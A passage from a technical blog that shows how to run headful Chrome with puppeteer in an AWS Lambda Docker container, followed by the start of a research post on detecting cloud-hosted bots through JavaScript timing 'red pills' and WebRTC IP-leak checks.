<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">browser</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">args</span><span class="p">,</span>
<span class="nx">defaultViewport</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">defaultViewport</span><span class="p">,</span>
<span class="nx">executablePath</span><span class="o">:</span> <span class="k">await</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">executablePath</span><span class="p">,</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span> <span class="c1">// we will use headful chrome</span>
<span class="nx">ignoreHTTPSErrors</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">let</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">url</span> <span class="o">||</span> <span class="s1">'https://bot.incolumitas.com'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">3000</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">new_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#new-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="kd">const</span> <span class="nx">old_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#detection-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="nx">result</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">new_tests</span><span class="o">:</span> <span class="nx">new_tests</span><span class="p">,</span>
<span class="nx">old_tests</span><span class="o">:</span> <span class="nx">old_tests</span><span class="p">,</span>
<span class="p">},</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">browser</span> <span class="o">!==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="nx">result</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<h3>Build the Container</h3>
<p>We are following the build <a href="https://docs.aws.amazon.com/lambda/latest/dg/images-create.html">instructions here</a>.</p>
<p>First, build the docker image with:</p>
<div class="highlight"><pre><span></span><code>docker build -t headful-test .
</code></pre></div>
<p>If everything works, you get the output: <code>Successfully tagged headful-test:latest</code></p>
<p>Then test the container with:</p>
<div class="highlight"><pre><span></span><code>docker container run headful-test
</code></pre></div>
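<p>To actually invoke the handler locally, you can use the Runtime Interface Emulator that ships with the AWS Lambda base images. It listens on port 8080 inside the container, so the container has to be started with a port mapping such as <code>docker run -p 9000:8080 headful-test</code>. The small Node.js client below is a sketch of such an invocation. The host port 9000 and the function names <code>buildInvokeRequest</code> and <code>invokeLocal</code> are assumptions for this example; the <code>url</code> field in the payload is the one that <code>run.js</code> reads from <code>event.url</code>.</p>

```javascript
const http = require('http');

// Build the HTTP request for the Runtime Interface Emulator endpoint.
function buildInvokeRequest(port, payload) {
  const body = JSON.stringify(payload);
  return {
    options: {
      hostname: 'localhost',
      port: port,
      path: '/2015-03-31/functions/function/invocations',
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Content-Length': Buffer.byteLength(body),
      },
    },
    body: body,
  };
}

// POST the payload to the local container and resolve with the raw response body.
function invokeLocal(port, payload) {
  const request = buildInvokeRequest(port, payload);
  return new Promise(function (resolve, reject) {
    const req = http.request(request.options, function (res) {
      let data = '';
      res.setEncoding('utf8');
      res.on('data', function (chunk) { data += chunk; });
      res.on('end', function () { resolve(data); });
    });
    req.on('error', reject);
    req.end(request.body);
  });
}

// Usage, with the container running and port 9000 mapped to 8080:
// invokeLocal(9000, { url: 'https://bot.incolumitas.com' }).then(console.log, console.error);
```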
<h3>Deploy the container to AWS Lambda</h3>
<p>Authenticate the Docker CLI to your Amazon ECR registry.</p>
<p><strong>Update your credentials</strong>:</p>
<ul>
<li>Change the region <code>us-east-1</code> to your AWS region.</li>
<li>Change the AWS account ID <code>123456789012</code> to your AWS ID.</li>
</ul>
<p>First, log in to AWS:</p>
<div class="highlight"><pre><span></span><code>aws ecr get-login-password --region us-east-1 <span class="p">|</span> docker login --username AWS --password-stdin <span class="m">123456789012</span>.dkr.ecr.us-east-1.amazonaws.com
</code></pre></div>
<p>Now we have to create a repository for our Docker image:</p>
<div class="highlight"><pre><span></span><code>aws ecr create-repository --repository-name headful-test --image-scanning-configuration <span class="nv">scanOnPush</span><span class="o">=</span><span class="nb">true</span>
</code></pre></div>
<p>Tag your image to match your repository name, and deploy the image to Amazon ECR using the docker push command.</p>
<div class="highlight"><pre><span></span><code>docker tag headful-test:latest <span class="m">123456789012</span>.dkr.ecr.us-east-1.amazonaws.com/headful-test:latest
docker push <span class="m">123456789012</span>.dkr.ecr.us-east-1.amazonaws.com/headful-test:latest
</code></pre></div>
<h3>Google Chrome with Xvfb fails</h3>
<p>However, if we try to run <code>google-chrome-stable</code> under <code>Xvfb</code>, the browser fails to start
in the AWS Lambda container.</p>
<p>This is the Dockerfile:</p>
<div class="highlight"><pre><span></span><code><span class="k">FROM</span><span class="w"> </span><span class="s">public.ecr.aws/lambda/nodejs:12</span>
<span class="c"># Install Xvfb</span>
<span class="k">RUN</span><span class="w"> </span>yum update -y <span class="o">&&</span> <span class="se">\</span>
yum install -y bzip2 gtk3 dbus-glib libXt xorg-x11-server-Xvfb ImageMagick xz procps
<span class="c"># Install latest Google Chrome browser</span>
<span class="k">RUN</span><span class="w"> </span>curl -o chrome.rpm https://dl.google.com/linux/direct/google-chrome-stable_current_x86_64.rpm
<span class="k">RUN</span><span class="w"> </span>yum install -y chrome.rpm
<span class="k">RUN</span><span class="w"> </span>mkdir /app
<span class="k">WORKDIR</span><span class="w"> </span><span class="s">/app</span>
<span class="k">COPY</span><span class="w"> </span>package*.json /app/
<span class="k">RUN</span><span class="w"> </span>npm install
<span class="k">COPY</span><span class="w"> </span>run.js /app/
<span class="c"># Required for Xvfb</span>
<span class="k">ENV</span><span class="w"> </span><span class="nv">DISPLAY</span><span class="o">=</span><span class="s2">":99.0"</span>
<span class="k">CMD</span><span class="w"> </span><span class="p">[</span><span class="s2">"/app/run.handler"</span><span class="p">]</span>
</code></pre></div>
<p>And this is <code>run.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">chromium</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-aws-lambda'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">exec</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'child_process'</span><span class="p">).</span><span class="nx">exec</span><span class="p">;</span>
<span class="cm">/**</span>
<span class="cm"> * Executes a shell command and return it as a Promise.</span>
<span class="cm"> * @param cmd {string}</span>
<span class="cm"> * @return {Promise<string>}</span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">execShellCommand</span><span class="p">(</span><span class="nx">cmd</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">exec</span><span class="p">(</span><span class="nx">cmd</span><span class="p">,</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">warn</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">stdout</span><span class="o">?</span> <span class="nx">stdout</span> <span class="o">:</span> <span class="nx">stderr</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">context</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// Attempt to launch Xvfb</span>
<span class="kd">let</span> <span class="nx">output</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">execShellCommand</span><span class="p">(</span><span class="s1">'Xvfb :99 -ac -screen 0 1024x768x24 -nolisten tcp &'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">output</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">browser</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">args</span><span class="p">,</span>
<span class="nx">defaultViewport</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">defaultViewport</span><span class="p">,</span>
<span class="nx">executablePath</span><span class="o">:</span> <span class="s1">'google-chrome-stable'</span><span class="p">,</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span> <span class="c1">// we will use headful chrome</span>
<span class="nx">ignoreHTTPSErrors</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">let</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">url</span> <span class="o">||</span> <span class="s1">'https://bot.incolumitas.com'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">4000</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">new_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#new-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="kd">const</span> <span class="nx">old_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#detection-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="nx">result</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">new_tests</span><span class="o">:</span> <span class="nx">new_tests</span><span class="p">,</span>
<span class="nx">old_tests</span><span class="o">:</span> <span class="nx">old_tests</span><span class="p">,</span>
<span class="p">},</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">browser</span> <span class="o">!==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="nx">result</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<p>We get the following error message when attempting to run on AWS Lambda:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="nt">"errorType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Error"</span><span class="p">,</span><span class="w"></span>
<span class="nt">"errorMessage"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Failed to launch the browser process!\nmkdir: cannot create directory ‘/.local’: Read-only file system\ntouch: cannot touch ‘/.local/share/applications/mimeapps.list’: No such file or directory\n/usr/bin//google-chrome-stable: line 45: /dev/fd/62: No such file or directory\n/usr/bin//google-chrome-stable: line 46: /dev/fd/62: No such file or directory\n[25:25:0123/133757.218681:ERROR:browser_main_loop.cc(585)] Failed to open an X11 connection.\n[25:25:0123/133757.220449:ERROR:browser_main_loop.cc(1438)] Unable to open X display.\n[25:25:0123/133757.555175:ERROR:service_utils.cc(157)] --ignore-gpu-blacklist is deprecated and will be removed in 2020Q4, use --ignore-gpu-blocklist instead.\n\n\nTROUBLESHOOTING: https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md\n"</span><span class="p">,</span><span class="w"></span>
<span class="nt">"stack"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Error: Failed to launch the browser process!"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"mkdir: cannot create directory ‘/.local’: Read-only file system"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"touch: cannot touch ‘/.local/share/applications/mimeapps.list’: No such file or directory"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"/usr/bin//google-chrome-stable: line 45: /dev/fd/62: No such file or directory"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"/usr/bin//google-chrome-stable: line 46: /dev/fd/62: No such file or directory"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"[25:25:0123/133757.218681:ERROR:browser_main_loop.cc(585)] Failed to open an X11 connection."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"[25:25:0123/133757.220449:ERROR:browser_main_loop.cc(1438)] Unable to open X display."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"[25:25:0123/133757.555175:ERROR:service_utils.cc(157)] --ignore-gpu-blacklist is deprecated and will be removed in 2020Q4, use --ignore-gpu-blocklist instead."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"TROUBLESHOOTING: https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at onClose (/app/node_modules/puppeteer-core/lib/cjs/puppeteer/node/BrowserRunner.js:193:20)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Interface.<anonymous> (/app/node_modules/puppeteer-core/lib/cjs/puppeteer/node/BrowserRunner.js:183:68)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Interface.emit (events.js:326:22)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Interface.close (readline.js:416:8)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Socket.onend (readline.js:194:10)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Socket.emit (events.js:326:22)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at endReadableNT (_stream_readable.js:1241:12)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at processTicksAndRejections (internal/process/task_queues.js:84:21)"</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Several different approaches were tried (see the resources below), but none of them worked.</p>
<h3>Resources & Links</h3>
<p><a href="https://gist.github.com/cpsubrian/3aa40f6f3d6ce2c707b9d8e34c652dcf#gistcomment-3553963">Gist attempting to do the same on Ubuntu 18.04</a>. </p>
<p><a href="https://github.com/aws/aws-lambda-base-images/tree/nodejs12.x">AWS Lambda base images</a></p>
<p><a href="https://acloudguru.com/blog/engineering/packaging-aws-lambda-functions-as-container-images">Some blog article</a></p>
<p><a href="https://aripalo.com/blog/2020/aws-lambda-container-image-support/">Another blog article</a></p>
<p>Some other, related projects:</p>
<p><a href="https://github.com/atlassian/docker-chromium-xvfb/tree/master/images/base">docker-chromium-xvfb</a></p>
<p><a href="https://gallery.ecr.aws/q3b9l9y9/chromium-xvfb-js">chromium-xvfb-js</a></p>
<p><a href="https://github.com/nisaacson/aws-lambda-xvfb">aws-lambda-xvfb</a></p>
<p><a href="https://dev.to/eoinsha/container-image-support-in-aws-lambda-deep-dive-2keh">Container Image Support in AWS Lambda Deep Dive</a></p>
<p><a href="https://github.com/fourTheorem/lambda-image-page-record">Lambda Image Page Recorder</a></p>
<p><a href="https://stackoverflow.com/questions/65429877/aws-lambda-container-running-selenium-with-headless-chrome-works-locally-but-not">A very recent discussion on Stack Overflow</a></p>
<h2>Browser Red Pills: Why are you browsing my website from AWS Lambda?</h2>
<p>Nikolai Tschacher, 2021-01-17</p>
<p>Advanced bots use modern browsers and automation frameworks such as puppeteer and playwright. It is becoming increasingly hard to distinguish bots from real human traffic, so new detection methods are required.</p>
<p><strong>Please Note: This blog post is not finished yet. Research is still ongoing.</strong></p>
<h3>Introduction</h3>
<p>Advanced web bots are becoming more powerful with each passing day. With the help of browser automation frameworks such as <a href="https://github.com/puppeteer/puppeteer">puppeteer</a> and <a href="https://github.com/microsoft/playwright">playwright</a>, fully fledged Chrome browsers are deployed to the cloud and programmed to automate many different workflows that are too tedious and repetitive for humans.</p>
<p>Those advanced web bots are employed for many different use cases:</p>
<ul>
<li>Scraping SERP data from Search Engines such as Google, Bing or Baidu</li>
<li>Price data scraping from sites such as eBay or Amazon in order to gain a competitive edge</li>
<li>Advertisement Fraud: Make bots click on Advertisement Links and cash in the ad impression payout</li>
<li>Sneaker Bots: Automatically buying highly sought after goods such as limited edition Nike sneakers</li>
<li>Social Media Bots (such as Twitter Bots): Misleading and spreading false information with the aim to manipulate the consuming masses</li>
</ul>
<p>The general tendency is very clear: A lot of behavior on the Internet is completely automated. This trend will most likely continue and there is a <a href="https://incolumitas.com/pages/BotOrNot/">constant battle between bot programmers and anti-bot companies</a>.</p>
<p>In my humble opinion, as long as bot traffic is not causing Denial of Service issues or leading to any direct damage, it should not be legally sanctioned. After all, public data is public for a reason. For example: Scraping public data from a site without using excessive bandwidth and without causing traffic bursts is okay. On the other hand, influencing people by posting misleading comments is not okay.</p>
<p>Therefore, there is a constant demand for detecting bad bot behavior. The range of available techniques is vast. Mostly however, the detection techniques can be grouped into the following categories:</p>
<ul>
<li>IP Address reputation techniques</li>
<li>Browser Fingerprinting</li>
<li>Browsing Behavioral Analysis</li>
</ul>
<h3>The Idea</h3>
<p>For economic reasons, most bot programmers do not use their own personal computer to run their bots. The reason is obvious: A personal computer does not scale horizontally and it is impractical to let it run constantly.</p>
<p>Therefore, bot owners usually rent cloud computational resources to host their bots. A popular solution is to automatically <a href="https://github.com/NikolaiT/Crawling-Infrastructure">spawn AWS EC2 instances in a docker swarm</a> and to assign a certain amount of resources to each container.</p>
<p>Another popular approach is to use serverless computation infrastructure such as <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> or Microsoft Azure.</p>
<p>The exact method does not matter. What all approaches have in common: Each crawler is assigned as few resources as possible in order to save infrastructure costs.</p>
<p>This is in stark contrast to most human website visitors: Real humans are using their browser on their computer and rendering a website usually takes only a fraction of all available computational resources.</p>
<h3>Motivation</h3>
<p>The motivation for this blog post comes from a paper by Stanford professor Dan Boneh and several other researchers. The paper's title is <a href="https://crypto.stanford.edu/~dabo/pubs/abstracts/browserRedPills.html">"Tick Tock: Building Browser Red Pills from Timing Side Channels"</a>. The paper is a great read and I highly recommend it.</p>
<p>In the paper, Boneh et al. look for browser-based techniques that use only JavaScript to reveal that the browser is running in a virtualized environment such as VirtualBox or VMware.</p>
<p>They propose different JavaScript functions of two different classes:</p>
<ol>
<li><strong>Baseline Operations</strong>: These algorithms are assumed to take the same execution time on bare metal machines as on virtual machines.</li>
<li><strong>Differential Operations</strong>: These algorithms have significantly different execution times in virtual machines compared to bare metal machines.</li>
</ol>
<p>The authors propose several techniques for the above two classes of algorithms and they successfully demonstrate that it is possible
to recognize that the browser is running in a virtual machine with high statistical confidence.</p>
<p>The purpose of this blog post is to take this concept from the above paper and to find algorithms for the two algorithm classes
that are able to tell a normal computing device (such as a laptop, smartphone or tablet) apart from generic cloud usage.</p>
<p>Put differently: Due to the restricted computational resources allocated to cloud-based web bots, I suspect that it is possible to find certain algorithms whose execution times differ significantly from those on normal devices used by humans.</p>
<h3>Other Researchers Thinking in the Same Direction</h3>
<p><a href="https://antoinevastel.com/">Antoine Vastel</a> wrote in his <a href="https://tel.archives-ouvertes.fr/tel-02343930/document">PhD thesis</a> submitted on 24th October 2019:</p>
<blockquote>
<p>I propose to investigate red pills, sequences of instructions that aim at detecting if a
browser is running in a virtualized environment, for bot detection. Indeed, since crawling
at scale requires a large infrastructure, a significant fraction of crawlers likely runs on
virtual machines from public cloud providers. Ho et al. proposed several red pills
capable of detecting if the host system is a virtual machine from within the browser.</p>
<p>Nevertheless, the paper has been published in 2014 and has not been evaluated on popular
public cloud providers. Moreover, the underlying implementations of some of the APIs
used in the red pills may have evolved, which can impact the accuracy of the red pills.
Thus, I argue there is a need for evaluating these red pills on the main public cloud
providers and developing new red pills techniques.</p>
</blockquote>
<h3>The Targeted Environment</h3>
<p>The goal of this blog article is to detect that a browser is running in serverless cloud infrastructure.
It is assumed that the serverless environment is assigned <code>1500MB</code> of memory. </p>
<p>For simplicity's sake, we will try to detect that a browser is running from within AWS Lambda. It should be possible
to distinguish AWS Lambda from at least the following devices:</p>
<ol>
<li>Normal Laptops</li>
<li>Tablets</li>
<li>Smart Phones</li>
</ol>
<p>The above devices must be reasonably modern, let's say not older than 6 years.</p>
<p>So what environmental restrictions does <a href="https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html">AWS Lambda</a> have?</p>
<p>A good start is to look at the <a href="https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-limits.html">limits of the AWS Lambda Environment</a>.</p>
<p>The essential question we need to ask ourselves: <strong>What is the best way to trigger the limits imposed by AWS Lambda with JavaScript without reaching the computational limits of the standard devices commonly used to browse the web (laptops, tablets, smartphones)?</strong></p>
<p>It appears that AWS Lambda <a href="https://towardsdatascience.com/why-we-dont-use-lambda-for-serverless-machine-learning-d00038e1b242">does not have good GPU support</a>.</p>
<p>As of 1st December 2020, it is possible to allocate <a href="https://aws.amazon.com/about-aws/whats-new/2020/12/aws-lambda-supports-10gb-memory-6-vcpu-cores-lambda-functions/">up to 10GB of RAM and 6 vCPU cores</a> for Lambda Functions. vCPU cores are allocated proportionally to the amount of RAM (between 128 MB and 10,240 MB).</p>
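<p>To get a feeling for what the proportional allocation means for the <code>1500MB</code> environment assumed above, here is a rough sketch. It relies on the figure from the AWS documentation that 1,769 MB corresponds to one vCPU; the strictly linear scaling and the function name <code>estimateLambdaVcpus</code> are my own simplifying assumptions, not something AWS guarantees.</p>

```javascript
// Documented by AWS: a function with 1,769 MB has the equivalent of one vCPU.
var MB_PER_VCPU = 1769;
// Upper bound announced together with the 10 GB memory limit.
var MAX_VCPUS = 6;

// Hypothetical helper: assumes the CPU share scales linearly with memory.
function estimateLambdaVcpus(memoryMb) {
  if (memoryMb < 128 || memoryMb > 10240) {
    throw new RangeError('Lambda memory must be between 128 MB and 10,240 MB');
  }
  return Math.min(MAX_VCPUS, memoryMb / MB_PER_VCPU);
}

// Under these assumptions a 1500 MB function gets less than one full vCPU.
console.log('estimated vCPUs at 1500 MB: ' + estimateLambdaVcpus(1500).toFixed(2));
```

<p>If this approximation holds, a browser inside such a function has to share less than one core between rendering, JavaScript and everything else, which is exactly the kind of restriction a red pill could try to expose.</p>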
<h3>Other Detection Methods</h3>
<p>Our goal is to detect that a browser is running from within a serverless cloud infrastructure.</p>
<p>Several fingerprinting sites such as <a href="https://pixelscan.net/">pixelscan.net</a> and <a href="https://browserleaks.com">browserleaks.com</a> give rise to new promising ideas.</p>
<p>There are several other detection methods that come to mind quickly:</p>
<ul>
<li>See if the browser in the cloud <a href="https://browserleaks.com/dns">leaks DNS info</a> because its DNS resolution is not configured to run through the proxy</li>
<li>Check if the browser leaks the real IP address via WebRTC</li>
</ul>
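<p>The WebRTC check from the list above could look roughly like the following sketch. The function names, the STUN URL parameter and the timeout are placeholders chosen for illustration. Note that modern browsers often hide local addresses behind mDNS hostnames, so in practice mostly the server reflexive (<code>srflx</code>) candidates are interesting.</p>

```javascript
// Parses one ICE candidate line of the form
// "candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ..."
function parseIceCandidate(candidateLine) {
  var parts = candidateLine.trim().split(/\s+/);
  if (parts.length < 8 || parts[6] !== 'typ') {
    return null; // not a candidate line we understand
  }
  return { address: parts[4], port: Number(parts[5]), type: parts[7] };
}

// Hypothetical collector: gathers candidates for timeoutMs milliseconds and
// passes the parsed list to callback. Does nothing useful outside a browser.
function collectWebRtcAddresses(stunUrl, timeoutMs, callback) {
  if (typeof RTCPeerConnection === 'undefined') {
    callback([]);
    return;
  }
  var found = [];
  var pc = new RTCPeerConnection({ iceServers: [{ urls: stunUrl }] });
  pc.createDataChannel('probe'); // a channel is needed to start ICE gathering
  pc.onicecandidate = function (event) {
    if (event.candidate && event.candidate.candidate) {
      var parsed = parseIceCandidate(event.candidate.candidate);
      if (parsed) found.push(parsed);
    }
  };
  pc.createOffer()
    .then(function (offer) { return pc.setLocalDescription(offer); })
    .catch(function () { /* ignore: no candidates will be reported */ });
  setTimeout(function () { pc.close(); callback(found); }, timeoutMs);
}
```

<p>The collected addresses would then be sent to the server and compared with the source IP address of the HTTP request. A mismatch suggests that the browser sits behind a proxy.</p>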
<h3>Implementation Idea</h3>
<p>This is the basic algorithm that will be used in this blog post:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">redpill</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">baseStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">baselineOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">baseTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">baseStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'baseTime: '</span> <span class="o">+</span> <span class="nx">baseTime</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">diffStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">differentialOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">diffTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">diffStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'diffTime: '</span> <span class="o">+</span> <span class="nx">diffTime</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">diffTime</span> <span class="o">/</span> <span class="nx">baseTime</span> <span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
